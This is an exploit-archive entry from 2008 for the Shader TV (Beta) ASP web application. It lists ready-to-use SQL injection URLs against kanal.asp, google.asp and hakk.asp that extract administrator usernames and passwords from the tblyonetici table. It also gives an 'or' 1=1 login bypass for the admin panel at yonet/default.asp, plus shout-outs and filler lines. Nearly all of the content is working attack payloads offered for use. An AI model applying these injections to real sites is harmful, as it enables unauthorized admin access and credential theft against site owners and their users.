Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities

2008-05-08T00:00:00
ID 1337DAY-ID-2974
Type zdt
Reporter U238
Modified 2008-05-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities
==============================================================


Shader TV (Beta) Multiple Remote SQL Injection Vulnerable

Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html

Coded  : Asp

Lnguae : Acces


Discovered By U238 | < Ugurcan Engin > 

Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz  :

Web - Designer Solution Developer



0x1 = [S** Says : Allah Belan? Versin Ulan Siz0 !]

0x2 = [Ben Sadece Iyi Bir Insan Olmak Istemistim ] 


Exploit:

Administrator Login to  creative web panel is atack of to SQL injectin.


http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici

----

http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1

http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1

----

http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici

http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici


Administrator Panel : 

target/ShaderTV/yonet



-------------------------------

Admin Panel Login Bypass :

target/ShaderTV/yonet/default.asp


username : 'or' 1=1

password : 'or' 1=1


This is Admin Panel See You ?


---------------------------------



#  0day.today [2018-01-04]  #